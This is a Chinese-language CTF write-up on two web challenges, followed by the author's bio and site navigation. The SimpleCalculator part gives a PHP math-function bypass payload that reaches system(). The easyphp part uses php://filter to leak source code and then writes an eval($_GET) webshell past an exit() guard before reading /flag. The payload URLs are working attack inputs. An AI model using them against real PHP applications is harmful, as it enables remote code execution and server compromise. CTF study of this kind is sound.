0x00 SimpleCalculator
打開后,發現flag.php可執行數學函式,在網上找到一個原題:https://www.cnblogs.com/20175211lyz/p/11588219.html
可執行shell拿到flag,
payload如下:
http://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=\$pi=(is_nan\^(6).(4)).(tan\^(1).(5));\$pi=\$\$pi;\$pi{0}(\$pi{1})&0=system&1=cat%20/flag,
0x01 easyphp
打開后發現是個檔案包含的題目,可通過
http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
拿到原始碼:
他提示需要訪問7fa3b767c460b54a2be4d49030b349c7.php,訪問后,可以看到7fa3b767c460b54a2be4d49030b349c7.php的原始碼,
通過代碼審計,可以看到最后一行代碼content被exit()函式分隔,這是個繞過死亡exit的題目,而上述waf沒有過濾掉zlib.inflate,因此可以構造payload寫入shell,
http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=?content=php://filter/write=string.strip_tags|zlib.inflate|%3f%3e%3c%3fphp+eval(%24_GET%5ba%5d)%3b%3f%3e%3c%3f/resource=shell.php
然后執行shell,發現flag檔案,
http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= ls /
于是查看/flag,可獲得flag,
http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= cat /flag
想學習更多網路安全的知識,可以關注公眾號“SCLM安全團隊”,
lynnlovemin
CSDN認證博客專家
網路安全
Web滲透
CSDN認證博客專家
網路安全
Web滲透
李熠,中國石油規劃總院高級開發工程師,對Java編碼規范和編碼技巧有著獨特的見解,熱衷微服務架構,曾作為中小型企業CTO,帶領過超過30人的技術團隊,現專注于網路安全尤其是web滲透方向的研究,長期活躍于各大SRC平臺,為其提供漏洞報告,著有《Spring Cloud實戰演練》一書
轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/192670.html
標籤:python
上一篇:【考研政治】毛中特(思維導圖)
下一篇:JS 的騷操作